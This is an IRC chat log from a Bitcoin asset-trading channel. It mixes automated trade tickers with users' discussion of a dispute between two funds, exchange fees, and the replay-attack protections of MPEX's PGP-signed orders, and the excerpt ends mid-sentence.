[F.GIGA.ETF] 2600 @ 0.00044037 = 1.145 BTC [+] Sep 30 15:44:26 [GLBSE] [ASICMINER] 1 @ 0.1095 BTC [+] Sep 30 15:44:27 [GLBSE] [ASICMINER] 4 @ 0.109999 = 0.44 BTC [+] Sep 30 15:57:09 [GLBSE] [FPGAMINING] 9 @ 0.43324159 = 3.8992 BTC [-] Sep 30 16:02:21 [MPEX] [S.BVPS] 197 @ 0.0034919 = 0.6879 BTC [-] Sep 30 16:02:22 [MPEX] [S.BVPS] 82 @ 0.00340069 = 0.2789 BTC [-] Sep 30 16:07:58 [MPEX] [S.MPOE] 52600 @ 0.00036436 = 19.1653 BTC [+] Sep 30 16:08:00 [MPEX] [S.MPOE] 1203120 @ 0.000364 = 437.9357 BTC [-] Sep 30 16:08:01 [MPEX] [S.MPOE] 57600 @ 0.00036308 = 20.9134 BTC [-] Sep 30 16:08:02 [MPEX] [S.MPOE] 37770 @ 0.00036298 = 13.7098 BTC [-] Sep 30 16:08:03 [MPEX] [S.MPOE] 47800 @ 0.00036284 = 17.3438 BTC [-] Sep 30 16:08:04 [MPEX] [S.MPOE] 2451 @ 0.00036174 = 0.8866 BTC [-] Sep 30 16:08:05 [MPEX] [S.MPOE] 3511 @ 0.00036168 = 1.2699 BTC [-] Sep 30 16:08:06 [MPEX] [S.MPOE] 25100 @ 0.00036165 = 9.0774 BTC [-] Sep 30 16:08:07 [MPEX] [S.MPOE] 60061 @ 0.00036137 = 21.7042 BTC [-] Sep 30 16:08:08 [MPEX] [S.MPOE] 3354 @ 0.00036136 = 1.212 BTC [-] Sep 30 16:08:09 [MPEX] [S.MPOE] 47300 @ 0.00036095 = 17.0729 BTC [-] Sep 30 16:08:10 [MPEX] [S.MPOE] 26000 @ 0.0003608 = 9.3808 BTC [-] Sep 30 16:08:11 [MPEX] [S.MPOE] 19253 @ 0.00036076 = 6.9457 BTC [-] Sep 30 16:08:12 [MPEX] [S.MPOE] 50737 @ 0.00036042 = 18.2866 BTC [-] Sep 30 16:08:13 [MPEX] [S.MPOE] 34547 @ 0.00036042 = 12.4514 BTC [-] Sep 30 16:08:14 [MPEX] [S.MPOE] 50923 @ 0.00036031 = 18.3481 BTC [-] Sep 30 16:08:15 [MPEX] [S.MPOE] 21100 @ 0.00036023 = 7.6009 BTC [-] Sep 30 16:08:16 [MPEX] [S.MPOE] 56773 @ 0.0003602 = 20.4496 BTC [-] Sep 30 16:11:12 anyone having problems withdrawing funds from GLBSE? I withdrew some funds last night/this morning and I still have yet to get them @ my online wallet. Sep 30 16:11:55 I guess I will email nefario and wait a few days to get an answer - if I get one @ all. Sep 30 16:12:49 [GLBSE] [GSDPT] 100 @ 0.0034 = 0.34 BTC [+] Sep 30 16:12:56 asa1024: I withdrew some 3 or 4 hours ago (around 17 BTC) Sep 30 16:13:15 !ticker S.MPOE Sep 30 16:13:16 [MPEX:S.MPOE] 1day: 0.0003602 / 0.0003694 / 0.00039999 (3820740 shares, 1,411.42 BTC), 30day: 0.00034 / 0.00039286 / 0.00042 (61323438 shares, 24,091.70 BTC) Sep 30 16:13:16 assbot: if you tried to withdraw a large amount, it may be unavailable yet in the hot wallet Sep 30 16:13:18 okay ty oneeyed Sep 30 16:13:31 it was a small amount Sep 30 16:13:36 just a divided payment Sep 30 16:16:53 ;;rate asa1024 1 "prolific coinbr user/tester" Sep 30 16:16:54 Rating entry successful. Your rating of 1 for user asa1024 has been recorded. Sep 30 16:17:20 w00t my first rating! Sep 30 16:17:24 ty! Sep 30 16:17:48 Where I can find list of assets, that are not connected with mining? Sep 30 16:18:41 [GLBSE] [MERGEDMINING] 90 @ 0.063 = 5.67 BTC [+] Sep 30 16:18:46 Cylta, on the homepages of the exchanges, i guess?! Sep 30 16:19:38 Drekk what do you mean? Sep 30 16:20:17 EskimoBob: you must be mistaken: how could CPA close shop while it still has an ongoing uncancellable 100+ weeks contract with BMF? Sep 30 16:20:31 Cylta, like browse the list of assets in glbse and see whether or not they're related to mining Sep 30 16:20:36 OneEyed: because bmf and cpa are both ran by usagi Sep 30 16:21:33 Diablo-D3: I know that. But how will the dispute about this contract be resolved? Who will win? CPA shareholders or BMF shareholders? Can't be both. Sep 30 16:22:04 jurov: yay, coinbr with more testers bugfree soon and going mainstream :) Sep 30 16:22:24 OneEyed: BMF will no longer be insured by CPA Sep 30 16:22:48 OneEyed: technically its a conflict of interest anyhow, so arguably the contract was invalid to begin with Sep 30 16:22:59 Diablo-D3: so will the 5 BTC amount payed every week to CPA be reimbursed to BMF? Sep 30 16:23:40 OneEyed: probably. Sep 30 16:23:44 Diablo-D3: otherwise, it would be easy to assure a default and stop right in the middle of the contract when you feel it may effectively default Sep 30 16:23:46 CPA is paying out on its contracts before closure Sep 30 16:24:44 Diablo-D3: I understand CPA is paying out its ongoing debt, that is contracts that have already defaulted, that's not the same thing Sep 30 16:25:29 OneEyed: the term "contract default" doesnt have the meaning here you think it does Sep 30 16:26:12 if I paid CPA x btc over several weeks, and they pay me back x btc to cancel the contract, they havent defaulted on the contract Sep 30 16:26:36 to default is if I a claim was made on the insurance and CPA paid out nothing Sep 30 16:26:39 s/I// Sep 30 16:27:15 Diablo-D3: agreed. Except that the contract is explicitely uncancellable. So to let CPA out of its obligations, BMF should ask for all the premiums already paid, if not more. Sep 30 16:28:00 Unless BMF thinks that the insurance it signed the contract for is no longer worth the premium to be paid, and wants out as well :) Sep 30 16:28:26 OneEyed: except CPA and BMF are ran by the same guy Sep 30 16:28:40 so the guy that thought shutting down CPA was a good idea is the same guy who runs BMF. Sep 30 16:29:40 OneEyed: CPA is no longer in business, so the term uncancellable has no meaning Sep 30 16:30:25 Diablo-D3: that's where the fact that both are run by the same person give it a meaning again: usagi can't say "eh, usagi said it was out of business, so I usagi can do nothing" Sep 30 16:31:02 OneEyed: exactly. Sep 30 16:31:07 "Sorry guys, I've been screwed up by this usagi person - Yours, usagi" Sep 30 16:31:18 and no, BMF shareholders wernt screwed Sep 30 16:31:55 but I dont care either way Sep 30 16:31:59 Im neither a cpa or bmf investor Sep 30 16:32:02 Diablo-D3: why? When you agree to pay a premium every week for an insurance, you take the duration of the contract in account as well. Sep 30 16:32:49 basically GLBSE has turned into a minefield Sep 30 16:32:53 usagi: I'm seeing this and try to understand. So far, I can't understand the CPA / BMF situation. Sep 30 16:32:57 usagi: you ARE closing it Sep 30 16:33:13 [MPEX] [S.MPOE] 17200 @ 0.00036596 = 6.2945 BTC [+] Sep 30 16:33:25 OneEyed: btw, theres also a structure of how the CPA contract was written Sep 30 16:33:34 usagi: you mean he wants people to understand by themselves? That looks rather sane to me, doesn't it? Sep 30 16:33:43 OneEyed: I havent looked at it, but if it only covers up to what was paid in, then BMF has no recourse Sep 30 16:33:52 OneEyed: usagi is paying usagi what was paid into it Sep 30 16:34:47 usagi: I'm trying to understand why insuring BMF with CPA was a good idea to start with, given that you might have known that you would shut CPA down before paying BMF anything. I'm not in your head, so I cannot make my mind about whether you knew that you would or would not shut down CPA. Sep 30 16:34:58 it wasnt a good idea. Sep 30 16:35:11 usagi can accuse me of being a troll, but its a conflict of interest Sep 30 16:35:21 the cpa contract is worth zero no matter if usagi is the best fund manager in the world or not Sep 30 16:36:46 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 30 16:36:53 usagi: from where I stand, it looks like you may have setup this contract for the sole purpose of transferring money from BMF to CPA through the premiums, since CPA won't go through the planned contract length that you agreed with yourself upon. Sep 30 16:37:05 CPA [1@0.1BTC] paid: 0.00569688 BTC. Last price: 0.04 BTC. Capital gain: -0.06 BTC. Total: -0.05430312 BTC. (-54.3%) Sep 30 16:37:18 But once again, you may not have planned to shut down CPA, but in this case, I don't understand why you decided for it. Sep 30 16:38:17 woah Sep 30 16:38:25 theres a scammer accusations board on the forum Sep 30 16:38:44 I wonder if I can automate this with perl Sep 30 16:39:03 Jackmaninov: well, I cant ban people posting in it Sep 30 16:39:12 this is seriously offtopic for the forum Sep 30 16:39:45 I wonder which admin thought this was a good idea Sep 30 16:39:49 And as a (admittedly not very good) go player myself, I can't read what you're trying to do here since it doesn't correspond to what you write. Sep 30 16:40:21 (btw, usagi, at least one of the go books you pointed onto in the forum should be ran through LaTeX again, references are unresolved and appear like "page ???") Sep 30 16:41:34 so wait Sep 30 16:41:40 EskimoBob signed an NDA with usagi? Sep 30 16:41:50 usagi: it makes your text look good though Sep 30 16:42:01 usagi: and the diagrams look professional Sep 30 16:42:09 usagi: then whats the jist of the EskimoBob is a scammer thread Sep 30 16:42:30 [GLBSE] [OBSI.HRPT] 1 @ 0.03962152 BTC [+] Sep 30 16:42:31 [GLBSE] [OBSI.HRPT] 1 @ 0.04596999 BTC [+] Sep 30 16:43:10 EskimoBob: nope Sep 30 16:43:17 nefario miiiiiiiight end up with one though Sep 30 16:43:30 he almost did due to the dmc shit, but he backed down Sep 30 16:43:44 he might still get one because of the goat shit, though Sep 30 16:44:02 usagi: you cant read the staff forum. Sep 30 16:44:24 and you already know theymos is selling is stake in glbse Sep 30 16:44:46 so if you know those two things, whats the obvious conclusion? Sep 30 16:44:56 I went to around 100 BTC worth of assets on GLBSE to 6 BTC in two weeks (with no loss, or even profit). I don't trust GLBSE with my coins anymore, since they may screw me if they don't like the issuer of the assets they let me invest in. Sep 30 16:45:18 usagi: this is true, but thats not what I meant Sep 30 16:45:32 theymos is tired of nefario's mismanagement Sep 30 16:45:51 lets try this again Sep 30 16:45:54 _theymos is tired of nefario's mismanagement_ Sep 30 16:47:03 EskimoBob: so you work for btc now? Sep 30 16:47:28 usagi: HEY YOU Sep 30 16:47:38 GIVE ME 5 BTC OR ILL TELL EVERYONE YOUR SECRET! Sep 30 16:48:09 exactly, and after this legit blackmail (because maged said so), we'll be even Sep 30 16:48:39 my trolling cant be _that_ subtle >_> Sep 30 16:48:50 EskimoBob: I've seen that usagi accused you of being paid to spread FUD on him, but I've never seen anyone ask you if it was the case. So. Are you being paid by someone to damage usagi reputation in any way? Sep 30 16:49:15 OneEyed: but if that contract has an NDA, he cant say yes Sep 30 16:49:35 Diablo-D3: but he may not want to lie, and won't answer in this case :) Sep 30 16:49:48 does mircea_popescu or "the girl" pay you anything? Sep 30 16:50:09 usagi: why dont you just run a PR service Sep 30 16:50:30 If EskimoBob says he is not being paid by anyone to do that, well, I would have no reason not to believe him so far. Sep 30 16:50:45 EskimoBob: ? Sep 30 16:50:57 But he is either AFK or not willing to answer that :) Sep 30 16:51:08 EskimoBob: thanks :) Sep 30 16:51:09 usagi: well, your contract was with me not dmc Sep 30 16:51:22 usagi: I have 2.18 btc in my wallet. Sep 30 16:52:46 it doesn't look like anyone needs any paying for you to be discredited at this point Sep 30 16:54:26 please moderate us usagi Sep 30 16:55:06 common sense would not insure an hyip passthrough Sep 30 16:55:40 amen. Sep 30 16:56:58 If someone wants to buy my last 44 shares of FDBF on GLBSE at 0.149253 per share, do it before dividend time tonight Sep 30 16:57:37 hmm i was talking about obsi Sep 30 16:57:50 usagi: did those person who "knew" what pirate was doing put any investment in CPA? Sep 30 16:58:16 [MPEX] [F.GIGA.ETF] 7536 @ 0.00044037 = 3.3186 BTC [+] Sep 30 16:58:18 [MPEX] [F.GIGA.ETF] 550 @ 0.00044037 = 0.2422 BTC [+] Sep 30 16:58:19 [MPEX] [S.MPOE] 34700 @ 0.0003621 = 12.5649 BTC [-] Sep 30 16:58:20 [MPEX] [S.MPOE] 2627 @ 0.0003602 = 0.9462 BTC [-] Sep 30 16:58:22 [MPEX] [S.MPOE] 15200 @ 0.00036007 = 5.4731 BTC [-] Sep 30 16:58:43 If they didn't, that's a sign that they were not confident enough to bet on pirate, even though they "knew". If they did, we now know that they are gullible people :) Sep 30 16:59:23 why did you insure obsi.hrpt Sep 30 17:00:52 EskimoBob: well, CPA has been running for almost 3 months before shutting down. Sep 30 17:01:01 [GLBSE] [MMM] 1 @ 0.60000001 BTC [-] Sep 30 17:01:03 [GLBSE] [MMM] 2 @ 0.6 = 1.2 BTC [-] Sep 30 17:02:41 [GLBSE] [GIGAMINING] 1 @ 0.5871 BTC [+] Sep 30 17:02:42 [GLBSE] [GIGAMINING] 20 @ 0.5999 = 11.998 BTC [+] Sep 30 17:02:44 [GLBSE] [GIGAMINING] 10 @ 0.6 = 6 BTC [+] Sep 30 17:02:45 [GLBSE] [GIGAMINING] 3 @ 0.6 = 1.8 BTC [+] Sep 30 17:02:45 [GLBSE] [GIGAMINING] 1 @ 0.6 BTC [+] Sep 30 17:04:31 !ticker gigamining Sep 30 17:04:51 !ticker gigamining Sep 30 17:05:04 [GLBSE:GIGAMINING] [Bid: 0.6] [Ask: 0.6077] [Spread: 0.0077] [Last: 0.6] [24hVol: 29.79909999] [7dAvg: 0.60357668] Sep 30 17:06:41 !ticker FDBF Sep 30 17:06:56 [GLBSE:FDBF] [Bid: 0.121] [Ask: 0.149253] [Spread: 0.028253] [Last: 0.149253] [24hVol: 22.387947] [7dAvg: 0.13865753] Sep 30 17:07:00 !ticker S.BVPS Sep 30 17:07:01 [MPEX:S.BVPS] 1day: 0.00340069 / 0.0034999 / 0.00355 (2629 shares, 9.20 BTC), 30day: 0.001175 / 0.00342187 / 0.003801 (54737 shares, 187.30 BTC) Sep 30 17:07:44 [GLBSE] [GSDPT] 45001 @ 0.0034 = 153.0034 BTC [+] Sep 30 17:08:54 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 30 17:09:19 FDBF [1@0.14BTC] paid: 0.00605727 BTC. Last price: 0.149253 BTC. Capital gain: 0.009253 BTC. Total: 0.01531027 BTC. (10.9%) Sep 30 17:09:24 [GLBSE] [OBSI.HRPT] 9 @ 0.04597 = 0.4137 BTC [+] Sep 30 17:09:25 [GLBSE] [OBSI.HRPT] 50 @ 0.04599999 = 2.3 BTC [+] Sep 30 17:09:26 [GLBSE] [OBSI.HRPT] 25 @ 0.046 = 1.15 BTC [+] Sep 30 17:09:28 [GLBSE] [OBSI.HRPT] 9 @ 0.04758 = 0.4282 BTC [+] Sep 30 17:09:29 [GLBSE] [OBSI.HRPT] 1 @ 0.04760436 BTC [+] Sep 30 17:09:30 [GLBSE] [OBSI.HRPT] 57 @ 0.04768018 = 2.7178 BTC [+] Sep 30 17:09:31 [GLBSE] [OBSI.HRPT] 8 @ 0.04774751 = 0.382 BTC [+] Sep 30 17:09:33 [GLBSE] [OBSI.HRPT] 1 @ 0.04790045 BTC [+] Sep 30 17:09:34 [GLBSE] [OBSI.HRPT] 2 @ 0.048 = 0.096 BTC [+] Sep 30 17:09:34 [GLBSE] [OBSI.HRPT] 18 @ 0.04805468 = 0.865 BTC [+] Sep 30 17:09:35 [GLBSE] [OBSI.HRPT] 1 @ 0.04837486 BTC [+] Sep 30 17:09:36 [GLBSE] [OBSI.HRPT] 1 @ 0.04966 BTC [+] Sep 30 17:09:37 [GLBSE] [OBSI.HRPT] 3 @ 0.04968375 = 0.1491 BTC [+] Sep 30 17:09:38 [GLBSE] [OBSI.HRPT] 6 @ 0.04995 = 0.2997 BTC [+] Sep 30 17:10:10 [GLBSE] [BMF] 1 @ 0.515 BTC [+] Sep 30 17:10:12 [GLBSE] [BMF] 1 @ 0.5102 BTC [-] Sep 30 17:10:13 [GLBSE] [BMF] 3 @ 0.51 = 1.53 BTC [-] Sep 30 17:10:14 [GLBSE] [BMF] 2 @ 0.5002 = 1.0004 BTC [-] Sep 30 17:10:47 [GLBSE] [OBSI.HRPT] 1 @ 0.04995 BTC [+] Sep 30 17:10:47 [GLBSE] [OBSI.HRPT] 35 @ 0.049979 = 1.7493 BTC [+] Sep 30 17:10:49 [GLBSE] [OBSI.HRPT] 14 @ 0.04998 = 0.6997 BTC [+] Sep 30 17:10:50 [GLBSE] [OBSI.HRPT] 50 @ 0.05 = 2.5 BTC [+] Sep 30 17:12:28 EskimoBob: unless he's the majority shareholder as welll Sep 30 17:12:34 usagi: you are in the real world, why don't you sue him? Sep 30 17:12:37 [GLBSE] [BITBOND] 1 @ 0.30270001 BTC [-] Sep 30 17:15:41 Oh, I hadn't seen EskimoBob had a negative otc score Sep 30 17:16:45 hows the land of bitcoin assets today? fun as ever i assume? Sep 30 17:17:23 bunch of squabbling over some pocket change Sep 30 17:17:49 EskimoBob: I did :) Sep 30 17:17:57 EskimoBob: are you in Estonia? Sep 30 17:19:36 EskimoBob: I wondered, because of Otto de Voogd and you met, but he travels a lot from what I can read Sep 30 17:23:27 [MPEX] [S.MPOE] 10773 @ 0.00035998 = 3.8781 BTC [-] Sep 30 17:24:06 usagi: what was that that you asked him to do for money exactly? Sep 30 17:24:47 EskimoBob: I don't, I'm just a very satisfied investor, who is unwinding his position because I want out of GLBSE Sep 30 17:25:18 ;;ticker Sep 30 17:25:18 Best bid: 12.31801, Best ask: 12.39, Bid-ask spread: 0.07199, Last trade: 12.419, 24 hour volume: 10452, 24 hour low: 12.301, 24 hour high: 12.48443 Sep 30 17:27:07 EskimoBob: and I think people managing FDBF do a wonderful reporting job compared to other assets (I once tried investing in YABIF, and quickly got out because of obscure management practices) Sep 30 17:27:28 [GLBSE:BMF] [Bid: 0.5] [Ask: 0.64978967] [Spread: 0.14978967] [Last: 0.5002] [24hVol: 11.07085001] [7dAvg: 0.48254035] Sep 30 17:27:45 you guys might find a use for this ... blockchain in realtime http://worldzeitgeist.org/iseecoins.html Sep 30 17:28:03 (use a real browser) Sep 30 17:28:39 eh "modern" .. it uses websockets Sep 30 17:28:48 Cylta mpex.us Sep 30 17:28:51 and canvas Sep 30 17:29:02 and localstorage (if you choose to trak addresses) Sep 30 17:29:16 Not very reliable under Firefox 15.0.1/Linux Sep 30 17:29:25 :D enjoi Sep 30 17:29:47 thats based off the "unconfirmed txn" feed from blockchain.info Sep 30 17:29:48 so matthew ended up with a scammer tag? too bad Sep 30 17:29:56 so its simply graphing the latest txn's Sep 30 17:30:30 isnt he the guy behind the print bitcoin magazine? Sep 30 17:30:40 "WAS" Sep 30 17:31:43 he was fired/quit bitcoin magazine after his megapiratebetfail Sep 30 17:31:45 Mircea thanks! Sep 30 17:31:46 Cylta mpex.us as to your list Sep 30 17:32:05 pigeons no, he's never been paid anything. also he doesn't have any nda signed with mpex or me. Sep 30 17:32:19 That is what I looked for Sep 30 17:32:55 and also, eskimobob is on my ignore list lol. Sep 30 17:33:03 mircea_popescu: do you plan to have a promotional period where registration of a new PGP key is free by any chance? Sep 30 17:33:15 OneEyed i have, this was a couple months in spring. Sep 30 17:33:20 when mpex was beta. Sep 30 17:33:35 Yeah, I was talking about the future, not about the past :) Sep 30 17:35:24 in the future i intend to raise it to 50 btc Sep 30 17:35:40 this was planned for when volume crosses 100k per minth, but i held back because btcusd went from 5 to 12 Sep 30 17:35:46 still, it will happen in the future. Sep 30 17:35:50 Yeah, I've read the FAQ, I was just wondering if there was going to be a promotion. Too bad then :) Sep 30 17:36:14 nope, just an ever increasing cost to participate, prolly will be in the 10-50k usd range before it stops. Sep 30 17:36:18 I'm still wondering why you don't want to gain more on fees and less and registration. Sep 30 17:36:22 course you could just go through a broker etc. Sep 30 17:36:44 OneEyed mpex is for investors. it's not television. Sep 30 17:36:52 And that would probably increase the liquidity on the exchange to have more people. Sep 30 17:36:56 mircea_popescu: television? Sep 30 17:37:13 yes. i am not trying to entertain the masses. Sep 30 17:37:32 poor people bring drama not liquidity. i don't need drama. Sep 30 17:37:39 Fair enough :) Sep 30 17:39:33 jurov so how's coinbr coming along ? did users find a lot of holes ? Sep 30 17:42:23 [GLBSE] [BDK.BND] 50 @ 0.05 = 2.5 BTC [-] Sep 30 17:44:50 [GLBSE] [BMF] 3 @ 0.5005 = 1.5015 BTC [+] Sep 30 17:44:51 [GLBSE] [BMF] 2 @ 0.5002 = 1.0004 BTC [-] Sep 30 17:47:57 A low trade fee, high signup / monthly fee is better for liquidity (i.e. intrade's current model). Sep 30 17:48:40 [MPEX] [F.GIGA.ETF] 600 @ 0.00044037 = 0.2642 BTC [+] Sep 30 17:48:41 [MPEX] [F.GIGA.ETF] 2000 @ 0.00044037 = 0.8807 BTC [+] Sep 30 17:48:50 indeed. Sep 30 17:49:16 and 0.2% sale only fee is kind of hard to beat. Sep 30 17:49:26 [GLBSE] [BDK.BND] 65 @ 0.02502 = 1.6263 BTC [-] Sep 30 17:51:50 [GLBSE] [NASTY] 1 @ 0.36999999 BTC [-] Sep 30 17:51:51 [GLBSE] [NASTY] 13 @ 0.37 = 4.81 BTC [+] Sep 30 17:51:53 [GLBSE] [NASTY] 6 @ 0.378 = 2.268 BTC [+] Sep 30 17:51:54 [GLBSE] [NASTY] 2 @ 0.3788 = 0.7576 BTC [+] Sep 30 17:51:55 [GLBSE] [NASTY] 3 @ 0.39 = 1.17 BTC [+] Sep 30 17:51:56 [GLBSE] [NASTY] 1 @ 0.3898 BTC [-] Sep 30 17:51:57 [GLBSE] [NASTY] 1 @ 0.39859 BTC [+] Sep 30 17:51:58 [GLBSE] [NASTY] 4 @ 0.39879 = 1.5952 BTC [+] Sep 30 17:51:59 [GLBSE] [NASTY] 1 @ 0.39889999 BTC [+] Sep 30 17:56:04 [MPEX] [S.MPOE] 45727 @ 0.00036041 = 16.4805 BTC [+] Sep 30 17:56:06 [MPEX] [S.MPOE] 63100 @ 0.00036027 = 22.733 BTC [-] Sep 30 17:56:07 [MPEX] [S.MPOE] 46100 @ 0.00035993 = 16.5928 BTC [-] Sep 30 17:56:08 [MPEX] [S.MPOE] 22300 @ 0.00035979 = 8.0233 BTC [-] Sep 30 17:56:10 [MPEX] [S.MPOE] 47773 @ 0.00035878 = 17.14 BTC [-] Sep 30 17:56:15 [GLBSE] [RSM] 2 @ 0.28 = 0.56 BTC [-] Sep 30 18:01:21 mircea_popescu: out of curiosity, why don't you offer the possibility to update a key (expiration date, revocation)? It could be transferred the same way orders are, and that would make the system only more secure, wouldn't it? Sep 30 18:05:52 mircea_popescu: 1) you are the most paranoic person I ever seen 2) 20btc for registration?! Seriously? Sep 30 18:06:23 Cylta: paranoia is good when other people assets are manipulated :) Sep 30 18:07:27 Oneeyed I did not tell it's bad :-) Sep 30 18:11:18 [GLBSE] [BMF] 1 @ 0.5002 BTC [-] Sep 30 18:13:56 [GLBSE] [GSDPT] 1 @ 0.0034 BTC [+] Sep 30 18:21:29 [MPEX] [S.MPOE] 2300 @ 0.00036096 = 0.8302 BTC [+] Sep 30 18:21:30 [MPEX] [S.MPOE] 3500 @ 0.00036338 = 1.2718 BTC [+] Sep 30 18:34:33 What is the total amount of btc inside mpex? Approximately Sep 30 18:37:10 OneEyed cause of the risk involved in the scenario where someone manages to update someone else's key Sep 30 18:37:27 Cylta the market cap of companies listed is closing in on 1mn btc Sep 30 18:37:39 month;y trade volume is 50-200-100 sort of thing Sep 30 18:38:31 and yes, i am the most paranoic person you have ever seen. Sep 30 18:38:33 And what about glbse? They have about 1m btc too, I think Sep 30 18:38:39 do the math :) Sep 30 18:38:49 iirc it's about 60k or w/e Sep 30 18:38:53 Okay :-) Sep 30 18:39:19 giga has iirc 40k shares worth .5 each atm, Sep 30 18:39:27 and the rest isn't either very large or doing too good. Sep 30 18:39:40 [GLBSE] [BBBB] 42 @ 0.000128 = 0.0054 BTC [-] Sep 30 18:40:16 mircea_popescu: the only risk is a DOS, since you cannot remove anything from a key, only add to it - and if someone manages to sign a revocation certificate for someone else, well, that someone else will be happy to have the revocation added to his key! Sep 30 18:41:00 OneEyed the way mpex works, you're identified by your key id. Sep 30 18:41:08 if you change that you've pretty much lost the entire account. Sep 30 18:41:38 also, the server that processes auth is not connected to the internet. it'd have to be processed by hand, the update. Sep 30 18:43:46 mircea_popescu: it gets fed the PGP signed orders in some way (serial link? private Ethernet connection? whatever), so the key updates could enter the same way. Anyway, I was just curious about it, I'm not requesting a change :) Sep 30 18:44:09 no, i understand, i don't mind discussing it. Sep 30 18:44:17 (there is no risk in being fed invalid/bogus/attacker data, that's why people can trust keyservers, the only thing they can do is refuse to serve a key) Sep 30 18:44:27 if there's no code to process key updates then there's no way to hijack key updates. Sep 30 18:44:33 if there is then there might be. Sep 30 18:44:50 My point was that key update can be hijacked, that wouldn't do any harm except mark a compromised key as compromised Sep 30 18:44:54 (read: revoked) Sep 30 18:45:06 And even a revocation would only happen if the key was really compromised Sep 30 18:45:07 OneEyed a port open is a port open. Sep 30 18:45:32 pgp software was not really tested in this sort of environment, so im not letting it see the internets. Sep 30 18:46:33 [MPEX] [F.GIGA.ETF] 1700 @ 0.00044037 = 0.7486 BTC [+] Sep 30 18:46:49 mircea_popescu: what I had in mind, was a "gpg --refresh-keys" on an internet-connected server, then send the updated keyring to the non-internet machine, and have gpg merge both keyrings (keys being in append-only mode, this cannot remove any information or inject any bogus unsigned information, especially if no new keys are imported during the merge) Sep 30 18:46:58 Only a keyring file, which is public information, would be transmitted Sep 30 18:47:16 maybe something like that could be made to work Sep 30 18:47:23 it's not a priority atm tho. Sep 30 18:48:25 [GLBSE] [SILVER] 4 @ 0.00999998 = 0.04 BTC [-] Sep 30 18:48:27 [GLBSE] [SILVER] 6 @ 0.00999999 = 0.06 BTC [+] Sep 30 18:49:34 [GLBSE] [SILVER] 10 @ 0.00999999 = 0.1 BTC [+] Sep 30 18:50:13 mircea_popescu: as far as security is concerned, I haven't seen anything against replay attack. Maybe the attacker should have the possibility to add a "serial" or "uid" extra field, to ensure a signed message cannot be submitted again without being regenerated (it would require a new UID). Sep 30 18:50:34 (sorry if I look inquisitive, but your model is really interesting, I like this way of taking commands) Sep 30 18:50:40 [GLBSE] [SILVER] 3 @ 0.00999999 = 0.03 BTC [+] Sep 30 18:52:13 (oops, read "the customer", not "the attacker" :-) Sep 30 18:54:29 [GLBSE] [GIGAMINING] 3 @ 0.60010001 = 1.8003 BTC [+] Sep 30 18:54:56 OneEyed requests can't be submitted again atm Sep 30 18:55:29 the 2nd and subsequent requests on the same command just die with an error message. Sep 30 18:55:45 (tho i am considering allowing STATs be replayed) Sep 30 18:55:59 [GLBSE] [GIGAMINING] 8 @ 0.6001 = 4.8008 BTC [-] Sep 30 18:56:23 You mean I can't sign a message containing "BUY|foobar|10|1", submit it, then submit it again a day later? Sep 30 18:57:17 Or, as an attacker, intercept such a message, then resubmit it a day later, then again, then again, causing the original customer to buy 30 foobar instead of the intended 10? Sep 30 18:57:50 (a day later might be one second later if I were really an attacker) Sep 30 18:57:55 [GLBSE] [GIGAMINING] 5 @ 0.6 = 3 BTC [-] Sep 30 18:59:01 mircea, there aren't so many holes in coinbr, mostly UI glitches... only the dividends caught me with pants down Sep 30 19:00:06 OneEyed that's exactly what i mean Sep 30 19:00:16 jurov well that's great news! Sep 30 19:00:18 k Sep 30 19:00:39 OneEyed you can reuse the same clearsigned message, but you'll have to re-encrypt with mpex key Sep 30 19:00:53 jurov: heh, maybe i should buy some S.DICE too to test divs again Sep 30 19:01:19 mircea_popescu: why? I am talking about intercepting the message as submitted, that is signed by the customer key and encrypted with mpex key. Sep 30 19:01:20 FabianB it pains me to say, but i doubt evoorhees is as retarded as me, to end up making multiple payments :D Sep 30 19:01:37 OneEyed i know, and that won't work. Sep 30 19:01:39 lol Sep 30 19:01:56 mircea_popescu: why so? Do you check the signature date and require that it is unique? Sep 30 19:02:00 nope. Sep 30 19:02:10 (because the encryption happens afterwards, and can be done since the MPEX key is not secret) Sep 30 19:02:11 besides signature date can be messed with Sep 30 19:02:14 mircea_popescu: lol, but he'll hopefully pay one div Sep 30 19:02:33 mircea_popescu: so how do you distinguish between two identical orders and a replayed order then? Sep 30 19:02:46 OneEyed : lets go through this entire story. Sep 30 19:02:51 k Sep 30 19:03:14 legitimate user makes contract, call it C. he clearsigns it, make Cs. he then encrypts it with mpex key, making Ce Sep 30 19:03:22 now. nobody outside of mpex can get Cs from Ce. Sep 30 19:03:40 Yes, but an attacker might get Ce. Let's assume I intercept Ce via a man-in-the-middle attack. Sep 30 19:03:47 Ce will be accepted once. customer can re-sign the Cs and make Ce', which will also be accepted, once. Sep 30 19:04:01 attacker can try repeat Ce or Ce', but he just gets an error Sep 30 19:04:16 and attacker could re-sign Cs if he had Cs and make Ce'' which'd be accepted Sep 30 19:04:19 except attacker can't get Cs. Sep 30 19:04:32 Ok, so you identify Ce for uniqueness (with a checksum or whatever), to avoid replay, right? Sep 30 19:04:49 i identify it. i won't go into details of how. Sep 30 19:04:52 :) Sep 30 19:05:30 Ok, that's fine indeed. It means that the customer has to take care of not leaking Cs though. Sep 30 19:05:38 it does, and so he should. Sep 30 19:05:46 But Sep 30 19:05:57 *You* could replay the message then Sep 30 19:06:10 And pretend he reused the same Cs, when he didn't Sep 30 19:06:26 theoretically, i could. Sep 30 19:06:34 In fact (and I agree, that was not my original idea), the UID would protect the customer from you :) Sep 30 19:06:43 [GLBSE] [BTC-MINING] 8 @ 0.965 = 7.72 BTC [+] Sep 30 19:06:56 (and protect you against false accusations of having replayed a message if the customers submits several times the same Cs) Sep 30 19:06:58 well, it's not a bad ideea to have an uid from a safety pov Sep 30 19:07:07 the fact of the matter is, you can just trail it on as it is now Sep 30 19:07:12 except people don't really bother. Sep 30 19:07:21 i could mandate it, but i don't see the benefit sufficient. Sep 30 19:07:27 You could also refuse to accept the same Cs and answer with "duplicate message error" Sep 30 19:07:38 i could, yes. Sep 30 19:07:54 That would protect you from false claims, since you could produce the various signed messages with the repeated commands Sep 30 19:08:06 [GLBSE] [GOLD] 2 @ 0.00999998 = 0.02 BTC [-] Sep 30 19:08:23 (without UID, signing at different dates will produce different messages) Sep 30 19:08:40 and you could not forge that Sep 30 19:08:51 [GLBSE] [BTC-MINING] 2 @ 0.97 = 1.94 BTC [+] Sep 30 19:09:06 but i mean, what is the false claim im protecting myself from ? seems a rather narrow case. Sep 30 19:09:23 Let's assume I'm unsure it is wise to buy "foobar" at 